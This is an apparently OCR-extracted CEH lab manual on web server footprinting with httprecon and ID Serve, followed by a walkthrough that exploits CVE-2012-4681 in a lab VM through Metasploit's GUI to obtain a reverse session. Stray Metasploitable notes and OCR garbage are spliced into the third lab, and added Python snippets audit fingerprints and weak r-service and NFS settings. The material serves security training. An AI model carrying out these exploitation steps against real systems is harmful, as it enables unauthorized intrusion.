CEH Lab Manual
Hacking Web Servers
Module 12
Module 12 - Hacking Webservers

Hacking Web Servers

A web server, which can be referred to as the hardware, the computer, or the software, is the computer application that helps to deliver content that can be accessed through the Internet.

Lab Scenario
Today, most online services are implemented as web applications. Online banking, web search engines, email applications, and social networks are just a few examples of such web services. Web content is generated in real time by a software application running at server-side. So hackers attack the web server to steal credential information, passwords, and business information by DoS (DDoS) attacks, SYN flood, ping flood, port scan, sniffing attacks, and social engineering attacks. In the area of web security, despite strong encryption on the browser-server channel, web users still have no assurance about what happens at the other end. We present a security application that augments web servers with trusted co-servers composed of high-assurance secure coprocessors, configured with a publicly known guardian program. Web users can then establish their authenticated, encrypted channels with a trusted co-server, which then can act as a trusted third party in the browser-server interaction. Systems are constantly being attacked, and IT security professionals need to be aware of common attacks on web server applications. Attackers use sniffers or protocol analyzers to capture and analyze packets. If data is sent across a network in clear text, an attacker can capture the data packets and use a sniffer to read the data. In other words, a sniffer can eavesdrop on electronic conversations. A popular sniffer is Wireshark; it is also used by administrators for legitimate purposes. One of the challenges for an attacker is to gain access to the network to capture the data. If attackers have physical access to a router or switch, they can connect the sniffer and capture all traffic going through the system. Strong physical security measures help mitigate this risk.
As a penetration tester and ethical hacker of an organization, you must provide security to the company's web server. You must perform checks on the web server for vulnerabilities, misconfigurations, unpatched security flaws, and improper authentication with external systems.

Lab Objectives
The objective of this lab is to help students learn to detect unpatched security flaws, verbose error messages, and much more.
The objective of this lab is to:
■ Footprint web servers
■ Crack remote passwords
■ Detect unpatched security flaws

CEH Lab Manual Page 731
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Lab Environment
To carry out this lab, you need:
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows Server 2008, Windows 8 and Windows 7 as a virtual machine
■ A web browser with Internet access
■ Administrative privileges to run tools
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers

Lab Duration
Time: 40 Minutes

Overview of Web Servers
A web server, which can be referred to as the hardware, the computer, or the software, is the computer application that helps to deliver content that can be accessed through the Internet. Most people think a web server is just the hardware computer, but a web server is also the software computer application that is installed in the hardware computer. The primary function of a web server is to deliver web pages on request to clients using the Hypertext Transfer Protocol (HTTP). This means delivery of HTML documents and any additional content that may be included by a document, such as images, style sheets, and scripts. Many generic web servers also support server-side scripting using Active Server Pages (ASP), PHP, or other scripting languages. This means that the behavior of the web server can be scripted in separate files, while the actual server software remains unchanged. Web servers are not always used for serving the World Wide Web. They can also be found embedded in devices such as printers, routers, webcams and serving only a local network. The web server may then be used as a part of a system for monitoring and/or administering the device in question. This usually means that no additional software has to be installed on the client computer, since only a web browser is required.

TASK 1: Overview

Lab Tasks
Recommended labs to demonstrate web server hacking:
■ Footprinting a web server using the httprecon tool
■ Footprinting a web server using the ID Serve tool
■ Exploiting Java vulnerabilities using Metasploit Framework
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Lab 1
Footprinting a Webserver Using the httprecon Tool
The httprecon project undertakes research in the field of web server fingerprinting, also known as http fingerprinting.

Lab Scenario
Web applications are the most important ways for an organization to publish information, interact with Internet users, and establish an e-commerce/e-government presence. However, if an organization is not rigorous in configuring and operating its public website, it may be vulnerable to a variety of security threats. Although the threats in cyberspace remain largely the same as in the physical world (e.g., fraud, theft, vandalism, and terrorism), they are far more dangerous as a result. Organizations can face monetary losses, damage to reputation, or legal action if an intruder successfully violates the confidentiality of their data. DoS attacks are easy for attackers to attempt because of the number of possible attack vectors, the variety of automated tools available, and the low skill level needed to use the tools. DoS attacks, as well as threats of initiating DoS attacks, are also increasingly being used to blackmail organizations. In order to be an expert ethical hacker and penetration tester, you must understand how to perform footprinting on web servers.

Lab Objectives
The objective of this lab is to help students learn to footprint web servers. It will teach you how to:
■ Use the httprecon tool
■ Get a web server footprint

Lab Environment
To carry out the lab, you need:
■ httprecon tool located at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\httprecon
■ You can also download the latest version of httprecon from the link http://www.computec.ch/projekte/httprecon
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Run this tool in Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run tools
Note: httprecon is an open-source application that can fingerprint the application running on web servers.

Lab Duration
Time: 10 Minutes

Overview of httprecon
httprecon is a tool for advanced web server fingerprinting, similar to httprint. The httprecon project does research in the field of web server fingerprinting, also known as http fingerprinting. The goal is highly accurate identification of given httpd implementations.

TASK 1: Footprinting a Webserver

Lab Tasks
1. Navigate to D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\httprecon.
2. Double-click httprecon.exe to launch httprecon.
3. The main window of httprecon appears, as shown in the following figure.

[Screenshot: httprecon 7.3 main window. Menu: File, Configuration, Fingerprinting, Reporting, Help. Target field (http://, port 80) with an Analyze button. Request tabs: GET existing | GET long request | GET nonexisting | GET wrong protocol | HEAD existing | OPTIONS common | ... Result panes: Full Matchlist | Fingerprint Details | Report Preview, with columns Name, Hits, Match %.]
Note: httprecon is distributed as a ZIP file containing the binary and fingerprint databases.

FIGURE 1.1: httprecon main window

4. Enter the website (URL) www.juggyboy.com that you want to footprint and select the port number.
5. Click Analyze to start analyzing the entered website.
6. You should receive a footprint of the entered website.
[Screenshot: httprecon 7.3 - http://juggyboy.com:80/, Target (Microsoft IIS 6.0), GET existing tab selected. The response pane shows:]

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2012 11:36:10 GMT
Content-Length: 8451
Content-Type: text/html
Content-Location: http://juggyboy.com/index.html
Last-Modified: Tue, 02 Oct 2012 11:32:12 GMT
Accept-Ranges: none
ETag: "a47ee9091a0cd1:7a49"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

Matchlist (352 Implementations):
Name                    Hits   Match %
Microsoft IIS 6.0       88     100
Microsoft IIS 5.0       71     80.68
Microsoft IIS 5.1       63     71.59
Sun ONE Web Server 6.1  63     71.59
Apache 1.3.26           62     70.45
Zeus 4.3                62     70.45
Apache 1.3.37           60     68.18
Microsoft IIS 7.0       ...    ...

Note: httprecon uses a simple database per test case that contains all the fingerprint elements to determine the given implementation.
Note: The scan engine of httprecon uses nine different requests, which are sent to the target web server.

FIGURE 1.2: The footprint result of the entered website

7. Click the GET long request tab, which will list the GET request. Then click Fingerprint Details.
[Screenshot: httprecon 7.3 - http://juggyboy.com:80/, Target (Microsoft IIS 6.0), GET long request tab selected. The response pane shows:]

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 18 Oct 2012 11:35:20 GMT
Connection: close
Content-Length: 34

Fingerprint Details:
Protocol Version     HTTP 1.1
Statuscode           400
Statustext
Banner
X-Powered-By
Header Spaces        1
Capital after Dash   1
Header-Order Full    Content-Type,Date,Connection,Content-Length
Header-Order Limit   Content-Type,Date,Connection,Content-Length

Note: httprecon does not rely on simple banner announcements by the analyzed software.

FIGURE 1.3: The fingerprint and GET long request result of the entered website
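The fingerprint elements shown in the figure above, worked through in code as an added example (this is not code from the lab manual or from the httprecon project): it parses a raw HTTP response into the same elements and scores it against a stored profile, so a defender can see which elements a server still leaks once its Server and X-Powered-By headers are removed. The sample responses and the LIMIT_HEADERS set are constructed assumptions modelled on the IIS 6.0 output above.

```python
"""httprecon-style fingerprint elements from a raw HTTP response.

Added example: re-implements the elements the lab lists (protocol version,
status code/text, banner, X-Powered-By, header spaces, capital after dash,
header order) and scores a response against a stored profile, to show what a
server still leaks after its Server and X-Powered-By headers are removed.
"""
import re

# Assumption: headers that the "limit" order list is restricted to. The real
# httprecon list is not given in the lab.
LIMIT_HEADERS = {
    "Server", "Date", "Content-Type", "Content-Length", "Connection",
    "Accept-Ranges", "ETag", "Last-Modified", "X-Powered-By",
}

# Constructed sample response, modelled on the IIS 6.0 output in the lab.
SAMPLE_OK = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Thu, 18 Oct 2012 11:36:10 GMT\r\n"
    b"Content-Length: 8451\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Location: http://juggyboy.com/index.html\r\n"
    b"Last-Modified: Tue, 02 Oct 2012 11:32:12 GMT\r\n"
    b"Accept-Ranges: none\r\n"
    b'ETag: "a47ee9091a0cd1:7a49"\r\n'
    b"Server: Microsoft-IIS/6.0\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"\r\n<html>...</html>"
)

# The same server after an administrator removed the identifying headers.
SAMPLE_HARDENED = SAMPLE_OK.replace(
    b"Server: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\n", b"")

# Constructed "GET long request" response (status 400), modelled on the lab.
SAMPLE_BAD_REQUEST = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html\r\n"
    b"Date: Thu, 18 Oct 2012 11:35:20 GMT\r\n"
    b"Connection: close\r\n"
    b"Content-Length: 34\r\n"
    b"\r\n"
)


def fingerprint(raw):
    """Return the fingerprint elements of one raw HTTP response as a dict."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    m = re.match(r"(\w+)/(\d\.\d) (\d{3}) ?(.*)", lines[0])
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    proto, version, code, text = m.groups()
    names, values, spaces, capital = [], {}, 0, 0
    for line in lines[1:]:
        name, _, value = line.partition(":")
        names.append(name)
        values[name.lower()] = value.strip()
        if value.startswith(" "):       # "Header Spaces": space after the colon
            spaces = 1
        # "Capital after Dash": Content-Type (1) versus Content-type (0)
        if "-" in name and name.split("-", 1)[1][:1].isupper():
            capital = 1
    return {
        "protocol": proto,
        "version": version,
        "statuscode": code,
        "statustext": text,
        "banner": values.get("server", ""),
        "x_powered_by": values.get("x-powered-by", ""),
        "header_spaces": spaces,
        "capital_after_dash": capital,
        "header_order_full": ",".join(names),
        "header_order_limit": ",".join(n for n in names if n in LIMIT_HEADERS),
    }


def match_score(fp, profile):
    """Percentage of profile elements that the fingerprint fp agrees with."""
    hits = sum(1 for key, val in profile.items() if fp.get(key) == val)
    return round(100.0 * hits / len(profile), 2)


if __name__ == "__main__":
    profile = fingerprint(SAMPLE_OK)          # stored profile for IIS 6.0
    for label, raw in (("original", SAMPLE_OK), ("hardened", SAMPLE_HARDENED)):
        fp = fingerprint(raw)
        print("%-9s banner=%r order=%s score=%.2f%%" % (
            label, fp["banner"], fp["header_order_limit"],
            match_score(fp, profile)))
```

Stripping the banner drops the score from 100% to 60% but leaves protocol version, status text, header spacing and header capitalisation untouched, which is why a banner-only hardening does not defeat this kind of fingerprinting.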


Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility     Information Collected/Objectives Achieved
httprecon Tool   Output: Footprint of the juggyboy website
                 ■ Content-Location: http://juggyboy.com/index.html
                 ■ Content-Type: text/html
                 ■ ETag: "a47ee9091a0cd1:7a49"
                 ■ Server: Microsoft-IIS/6.0
                 ■ X-Powered-By: ASP.NET

Questions
1. Analyze the major differences between classic banner-grabbing of the server line and httprecon.
2. Evaluate the type of test requests sent by httprecon to web servers.

Internet Connection Required
☑ Yes  ☐ No

Platform Supported
☑ Classroom  ☐ iLabs
Lab 2
Footprinting a Webserver Using ID Serve
ID Serve is a simple, free, small (26 Kbytes), and fast general-purpose Internet server identification utility.

Lab Scenario
In the previous lab you learned to use the httprecon tool. httprecon is a tool for advanced web server fingerprinting, similar to httprint.
It is very important for penetration testers to be familiar with banner-grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine the role of servers within a network. In this lab you will learn the banner grabbing technique to determine a remote target system using ID Serve. In order to be an expert ethical hacker and penetration tester, you must understand how to footprint a web server.

Lab Objectives
This lab will show you how to footprint web servers and how to use ID Serve. It will teach you how to:
■ Use the ID Serve tool
■ Get a web server footprint

Lab Environment
To carry out the lab, you need:
■ ID Serve located at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\ID Serve
■ You can also download the latest version of ID Serve from the link http://www.grc.com/id/idserve.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Run this tool on Windows Server 2012 as host machine
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 10 Minutes
Note: ID Serve is a simple, free, small (26 Kbytes), and fast general-purpose Internet server identification utility.

Overview of ID Serve
ID Serve attempts to determine the domain name associated with an IP. This process is known as a reverse DNS lookup and is handy when checking firewall logs or receiving an IP address from someone. Not all IPs that have a forward direction lookup (Domain-to-IP) have a reverse (IP-to-Domain) lookup, but many do.

TASK 1: Footprinting a Webserver

Lab Tasks
1. In Windows Server 2012, navigate to D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Footprinting Tools\ID Serve.
2. Double-click idserve.exe to launch ID Serve.
3. The main window appears. Click the Server Query tab as shown in the following figure.

[Screenshot: ID Serve - Internet Server Identification Utility, v1.02. Personal Security Freeware by Steve Gibson. Copyright (c) 2003 by Gibson Research Corp. Tabs: Background | Server Query | Q&A/Help. The Server Query tab shows: "1. Enter or copy / paste an Internet server URL or IP address here (example: www.microsoft.com):" with an input field; "2. When an Internet URL or IP has been provided above, press this button to initiate a query of the specified server" with a Query The Server button; "3. Server query processing:" with an empty results pane; "4. The server identified itself as:" with an empty field; and Copy and Goto ID Serve web page buttons.]
Note: ID Serve can connect to any server port on any domain or IP address.

FIGURE 2.1: Welcome screen of ID Serve

4. In option 1 (Enter or copy / paste an Internet server URL or IP address), enter the website (URL) you want to footprint.
5. Enter http://10.0.0.2/realhome (the IP address is where the real home site is hosted) in step 1.
6. Click Query The Server to start querying the entered website.
7. After the completion of the query, ID Serve displays the results of the entered website as shown in the following figure.

[Screenshot: ID Serve, Server Query tab, with http://10.0.0.2/realhome entered in field 1. The "Server query processing:" pane shows:]

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 07 Aug 2012 06:05:46 GMT
Accept-Ranges: bytes
ETag: "c95dc4af6274cd1:0"

Note: ID Serve uses the standard Windows TCP protocol when attempting to connect to a remote server and port.
Note: ID Serve can almost always identify the make, model, and version of any web site's server software.

FIGURE 2.2: ID Serve detecting the footprint

Lab Analysis
Document all the server information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility   Information Collected/Objectives Achieved
ID Serve       Server Identified: Microsoft-IIS/8.0
               Server Query Processing:
               ■ HTTP/1.1 200 OK
               ■ Content-Type: text/html
               ■ Last-Modified: Tue, 07 Aug 2012 06:05:46 GMT
               ■ Accept-Ranges: bytes
               ■ ETag: "c95dc4af6274cd1:0"

Questions
1. Analyze how ID Serve determines a site's web server.
2. What happens if we enter an IP address instead of a URL?

Internet Connection Required
☐ Yes  ☑ No

Platform Supported
☑ Classroom  ☑ iLabs

Lab 3
Exploiting Java Vulnerability Using Metasploit Framework
Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.
Lab Scenario
Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, known and unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research. Metasploit Framework is one of the main tools for every penetration test engagement. To be an expert ethical hacker and penetration tester, you must have a sound understanding of Metasploit Framework, its various modules, exploits, payloads, and commands in order to perform a pentest of a target.

Lab Objectives
The objective of this lab is to demonstrate exploitation of JDK vulnerabilities to take control of a target machine.

Lab Environment
In this lab, you need:
■ Metasploit located at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Attack Tools\Metasploit
■ You can also download the latest version of Metasploit Framework from the link http://www.metasploit.com/download/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as host machine
■ Windows 8 running on a virtual machine as target machine
■ A web browser and Microsoft .NET Framework 2.0 or later in both host and target machine
■ JRE 7u6 running on the target machine (remove any other version of JRE installed in the target machine). The JRE 7u6 setup file (jre-7u6-windows-i586.exe) is available at D:\CEH-Tools\CEHv8 Module 12 Hacking Webservers\Webserver Attack Tools\Metasploit
■ You can also download the JRE 7u6 setup file at http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1637588.html
■ Double-click metasploit-latest-windows-installer.exe and follow the wizard-driven installation steps to install Metasploit Framework

Lab Duration
Time: 20 Minutes

Overview of the Lab
This lab demonstrates the exploit that takes advantage of two issues in JDK 7: the ClassFinder and MethodFinder.findMethod(). Both were newly introduced in JDK 7. ClassFinder is a replacement for classForName back in JDK 6. It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package). With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that's not always the case in JDK 6) in order to access Statement.acc's private field, modify AccessControlContext, and then disable Security Manager.

TASK 1: Installing Metasploit Framework

1. Install Metasploit on the host machine Windows Server 2012.
2. After installation completes, it will automatically open in your default web browser as shown in the following figure.
3. Click I Understand the Risks to continue.
[Screenshot: Firefox "This Connection is Untrusted" warning page for the Metasploit web interface, with the sections "What Should I Do?", "Get me out of here!", "Technical Details" and "I Understand the Risks".]

FIGURE 3.1: Metasploit Untrusted connection in web browser

4. Click Add Exception.

|+
1
£

* ? ▼ C ‫(ן‬
f
JJ* G o l
oge

& hts• k c K » . V'
tp:1 > * x t .

This Connection is Untrusted

It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt.SunToolkit (a restricted package).


FIGURE 3.2: Metasploit Adding Exceptions

5. In the Add Security Exception wizard, click Confirm Security Exception.



With sun.awt.SunToolkit, we can actually invoke getField() by abusing findMethod() in Statement.invokeInternal() (but getField() must be public, and that's not always the case in JDK 6) in order to access Statement.acc's private field, modify AccessControlContext, and then disable Security Manager.


FIGURE 3.3: Metasploit Add Security Exception

6. On the Metasploit - Setup and Configuration Login screen, enter text in the Username, Password, and Password confirmation fields and click Create Account.


Once Security Manager is disabled, we can execute arbitrary Java code. Our exploit has been tested successfully against multiple platforms, including: IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.


FIGURE 3.4: Metasploit Creating an Account

7. Click GET PRODUCT KEY in the Metasploit - Activate Metasploit window.

Product Key Activation


This Security Alert addresses security issues CVE-2012-4681 (US-CERT Alert TA12-240A and Vulnerability Note VU#636312) and two other vulnerabilities affecting Java running in web browsers on desktops.

8. Enter your valid email address in the Metasploit Community option and click GO.

These vulnerabilities are not applicable to Java running on servers or standalone Java desktop applications. They also do not affect Oracle server-based software.


These vulnerabilities may be remotely exploitable without authentication, i.e., they may be exploited over a network without the need for a username and password.


FIGURE 3.6: Metasploit Community version for License Key

9. Now log in to your email address and copy the license key as shown in the following figure.


To be successfully exploited, an unsuspecting user running an affected release in a browser will need to visit a malicious web page that leverages this vulnerability. Successful exploits can impact the availability, integrity, and confidentiality of the user's system.

FIGURE 3.7: Metasploit License Key in your email ID provided

10. Paste the product key and click Next to continue.

Due to the severity of these vulnerabilities, the public disclosure of technical details and the reported exploitation of CVE-2012-4681 "in the wild," Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.


The Metasploit Framework will always be free and open source. The Metasploit Project and Rapid7 are fully committed to supporting and growing the Metasploit Framework as well as providing advanced solutions for users who need an alternative to developing their own penetration testing tools. It's a promise.


FIGURE 3.8: Metasploit Activating using License Key

11. Click Activate License to activate the Metasploit license.



FIGURE 3.9: Metasploit Activation

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from Sourceforge.net and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

12. The Activation Successful window appears.
FIGURE 3.10: Metasploit Activation Successful

TASK 3: Updating Metasploit

13. Go to Administration and click Software Updates.

FIGURE 3.11: Metasploit Updating Software

14. Click Check for Updates, and after checking the updates, click Install.


By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. (Note: A video tutorial on installing Metasploitable 2 is available at the link Tutorial on installing Metasploitable 2.0 on a Virtual Box Host Only network.)

FIGURE 3.12: Metasploit Checking for Updates

15. After completing the updates it will ask you to restart, so click Restart.

This document outlines many of the security flaws in the Metasploitable 2 image. Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.

16. Wait until Metasploit restarts.



TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation). To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH.


FIGURE 3.14: Metasploit Restarts

TASK 4: Creating a New Metasploit Project

17. After completion of the restart it will redirect to Metasploit - Home. Now click Create New Project from the Project drop-down list.


This is about as easy as it gets. The next service we should look at is the Network File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported.
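The two Metasploitable 2 flaws described in these notes (r-services reachable on tcp/512-514 and trusting every host through a "+ +" entry, and the root filesystem exported over NFS to every client) can be caught on the defending side by auditing the configuration files that create them. The following Python script is an added example, not code from the lab manual or from Metasploit; it parses hosts.equiv/.rhosts, /etc/exports and inetd.conf text and reports the weak settings, and all file contents it runs on are constructed samples.

```python
"""Audit config files for the Metasploitable 2 style flaws described above:
"r" services (tcp/512-514) enabled and trusting every host via "+ +", and the
root filesystem exported over NFS to everyone. Added example, not from the
lab manual or Metasploit; the sample file contents below are constructed."""
import re

# inetd service names of the "r" services and the TCP ports they use
R_SERVICES = {"exec": 512, "login": 513, "shell": 514}

def _active_lines(text):
    """Yield config lines with comments and blank lines stripped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line

def parse_rhosts(text):
    """Parse hosts.equiv / .rhosts lines into (host, user) tuples."""
    entries = []
    for line in _active_lines(text):
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries

def rhosts_findings(text, filename):
    """Flag wildcard trust entries; '+ +' trusts every user on every host."""
    findings = []
    for host, user in parse_rhosts(text):
        if host == "+" and user == "+":
            findings.append(("CRITICAL", f"{filename}: '+ +' trusts every user on every host"))
        elif host == "+":
            findings.append(("HIGH", f"{filename}: '+' trusts every host (matching username)"))
        elif user == "+":
            findings.append(("HIGH", f"{filename}: every user on {host} is trusted"))
    return findings

def parse_exports(text):
    """Parse /etc/exports into (path, [(client, [options])]) entries."""
    exports = []
    for line in _active_lines(text.replace("\\\n", " ")):  # join continuations
        path, *specs = line.split()
        clients = []
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if not m:
                continue
            host = m.group(1) or "*"  # "(rw)" with no host applies to everyone
            opts = m.group(2).split(",") if m.group(2) else []
            clients.append((host, opts))
        if not clients:  # a bare path is exported to every host
            clients.append(("*", []))
        exports.append((path, clients))
    return exports

def exports_findings(text):
    """Flag exports of "/", wildcard clients and disabled root squashing."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            everyone = host == "*"
            if path == "/" and everyone:
                findings.append(("CRITICAL", f"/etc/exports: '/' exported to every host ({','.join(opts) or 'default options'})"))
            elif path == "/":
                findings.append(("HIGH", f"/etc/exports: '/' exported to {host}"))
            elif everyone:
                findings.append(("MEDIUM", f"/etc/exports: {path} exported to every host"))
            if "no_root_squash" in opts:
                findings.append(("HIGH", f"/etc/exports: {path} for {host} disables root squashing"))
    return findings

def inetd_findings(text):
    """Flag uncommented inetd.conf entries for the exec/login/shell services."""
    findings = []
    for line in _active_lines(text):
        service = line.split()[0]
        if service in R_SERVICES:
            findings.append(("HIGH", f"inetd.conf: r-service '{service}' (tcp/{R_SERVICES[service]}) is enabled"))
    return findings

def audit(hosts_equiv, rhosts, exports, inetd):
    """Run every check and return a list of (severity, message) findings."""
    return (rhosts_findings(hosts_equiv, "/etc/hosts.equiv")
            + rhosts_findings(rhosts, "~root/.rhosts")
            + exports_findings(exports) + inetd_findings(inetd))

# Constructed samples mirroring the layout described above (not real captures).
SAMPLE_HOSTS_EQUIV = "# constructed\n+ +\n"
SAMPLE_RHOSTS = "# constructed\n+\n"
SAMPLE_EXPORTS = "# constructed\n/ *(rw,sync,no_root_squash)\n/srv/share 10.0.0.0/24(ro,sync)\n"
SAMPLE_INETD = (
    "shell stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rshd\n"
    "login stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rlogind\n"
    "exec  stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.rexecd\n"
    "#finger stream tcp nowait nobody /usr/sbin/tcpd /usr/sbin/in.fingerd\n"
)

if __name__ == "__main__":
    for severity, message in audit(SAMPLE_HOSTS_EQUIV, SAMPLE_RHOSTS, SAMPLE_EXPORTS, SAMPLE_INETD):
        print(f"[{severity}] {message}")
```

Pointing the four functions at the real files on a host under review (read with open()) gives the same report for that host; the sample run reports seven findings, two of them CRITICAL.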



FIGURE 3.15: Metasploit Creating a New Project

18. In Project Settings, provide the Project Name and enter a Description, leave the Network Range set to its default, and click Create Project.



The Metasploit Framework is a penetration testing system and development platform that you can use to create security tools and exploits. The Metasploit Framework is written in Ruby and includes components in C and assembler. The Metasploit Framework consists of tools, libraries, modules, and user interfaces. The basic function of the Metasploit Framework is a module launcher that allows the user to configure an exploit module and launch the exploit against a target system.


FIGURE 3.16: Metasploit Project Settings

19. Click the Modules tab after the project is created.

FIGURE 3.17: Metasploit Modules Tab

TASK 5: Running the Exploit

20. Enter the CVE ID (2012-4681) in Search Modules and press Enter.


Metasploit Pro contains tasks, such as bruteforce and discovery, in the form of modules. The modules automate the functionality that the Metasploit Framework provides and enable you to perform multiple tasks simultaneously.


A project is the logical component that provides the intelligent defaults, penetration testing workflow, and module-specific guidance during the penetration test.

FIGURE 3.18: Metasploit Searching for Java Exploit

21. Click the Java 7 Applet Remote Code Execution link.

In addition to the capabilities offered by the open source framework, Metasploit Pro delivers a full graphical user interface, automated exploitation capabilities, complete user action audit logs, custom reporting, combined with an advanced penetration testing workflow.

FIGURE 3.19: Metasploit Java 7 Applet Remote Code Execution Exploit found

22. Configure the exploit settings:

a. In Payload Options set the Connection Type as Reverse and in Listener Host, enter the IP address where Metasploit is running.

b. In Module Options, enter the SRVHost IP address where Metasploit is running.

c. Enter the URI Path (in this lab we are using greetings) and click Run Module.



IPv6 is the latest version of the Internet Protocol designed by the Internet Engineering Task Force to replace the current version of IPv4. The implementation of IPv6 predominantly impacts addressing, routing, security, and services.

FIGURE 3.20: Metasploit Running Module

23. The task is started as shown in the following screenshot.

In Metasploit Pro, you can define IPv6 addresses for target hosts. For example, when you perform a discovery scan, scan a web application, execute a bruteforce attack, or run a module, you can define an IPv6 address for the target hosts. For modules, Metasploit Pro provides several payloads that provide IPv6 support for Windows x86, Linux x86, BSD x86, PHP, and cmd.


FIGURE 3.21: Metasploit Task Started

24. Now switch to the Windows 8 Virtual Machine, launch the Chrome browser, enter http://10.0.0.10:8080/greetings in the address bar and press Enter.

25. Click the Run this time for the Java(TM) was blocked because it is out of date prompt in the Chrome browser.


"

Window*; 8 on WIN‫?־‬N9ST0SG!FN * Virtual Machine Connprtion

Fl A t o Medi« Clpboard View Hdp
ie c i n

‫׳‬j

O (. ® O

II I► >3 i>

«‫ *- ־‬C □ 1 Q .1 t8 8 /g
0 0 0 0 0 reetin s/
g
i f JavafTM) was blockec because it is out of date

Update plug-in...

Run this time

Note: Metasploit Pro does not support IPv6 for link local broadcast discovery, social engineering, or pivoting. However, you can import IPv6 addresses from a text file or you can manually add them to your project. If you import IPv6 addresses from a text file, you must separate each address with a new line.

FIGURE 3.22: Windows 8 Virtual Machine - Running the Exploit

26. Now switch to your Windows Server 2012 host machine and check the Metasploit task pane. Metasploit will start capturing the reverse connection from the target machine.

Project Management
A Metasploit Pro project contains the penetration test that you want to run. A project defines the target systems, network boundaries, modules, and web campaigns that you want to include in the penetration test. Additionally, within a project, you can use discovery scan to identify target systems and bruteforce to gain access to systems.

FIGURE 3.23: Metasploit Capturing the reverse connection of targeted machine

27. Click the Sessions tab to view the captured connection of the target machine.


User Management
Administrators can assign user roles to manage the level of access that the user has to projects and administrative tasks. You can manage user accounts from the Administration menu.

FIGURE 3.24: Metasploit Session tab

28. Click the captured session to view the information of a target machine as shown in the following screenshot.

Global Settings
Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.



FIGURE 3.25: Metasploit Captured Session of a Target Machine

29. You can view the information of the target machine.


System Management
As an administrator, you can update the license key and perform software updates. You can access the system management tools from the Administration menu.

FIGURE 3.26: Metasploit Target Machine System information

Host Scan
